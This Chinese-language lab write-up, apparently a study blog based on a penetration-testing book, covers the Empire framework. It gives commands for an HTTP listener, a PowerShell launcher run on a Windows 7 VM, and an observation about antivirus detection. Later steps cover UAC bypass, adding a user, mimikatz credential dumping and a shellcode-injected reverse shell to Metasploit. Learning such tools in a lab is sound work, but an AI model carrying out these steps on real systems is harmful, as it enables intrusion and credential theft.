前言
最近在看《Web安全攻防》一书,将不熟悉的Empire进行实验操作来学习。
参考资料《Web安全攻防渗透测试实战指南》
Empire安装
安装Empire工具比较简单。。选择直接安装在kali
git clone https://github.com/EmpireProject/Empire.git
cd /Empire/setup
./install
实验操作
靶机:windows service pack1 虚拟机 (装有电脑管家)(IP:192.168.72.154)
攻击机:kali(IP:192.168.72.163)
启动Empire
listeners 监听
uselistener http 选择监听的模式
info 查看参数设置
set Name cseroad 设置名字
set Host 192.168.72.163 设置本主机IP
execute 执行监听
list 查看列出当前激活的listener
agents 查看会话
注:开启多个监听时,名称必须不一样,而且端口也必须不一样,否则不能创建。
launcher powershell cseroad 生成payload
将该代码在靶机win7的cmd下运行。
可以看到Empire已经上线了一个名为UVXTMAE7的主机,且电脑管家没有提示。
在360上运行则出现了提示
更多木马生成:
interact UVXTMAE7 命令进入会话
shell ipconfig 执行系统命令
systinfo 查看该靶机基本信息
sc 截图
更多命令:help
提权
bypassuac cseroad 自动提权
*表示提权成功
添加用户成功。
mimikatz 读取hash,获取管理员密码
结合metasploit
usemodule code_execution/invoke_shellCode 使用模块
set Lhost 192.168.72.163
set Lport 8088
msf设置的参数和use module 保持一致。
得到Empire反弹的shell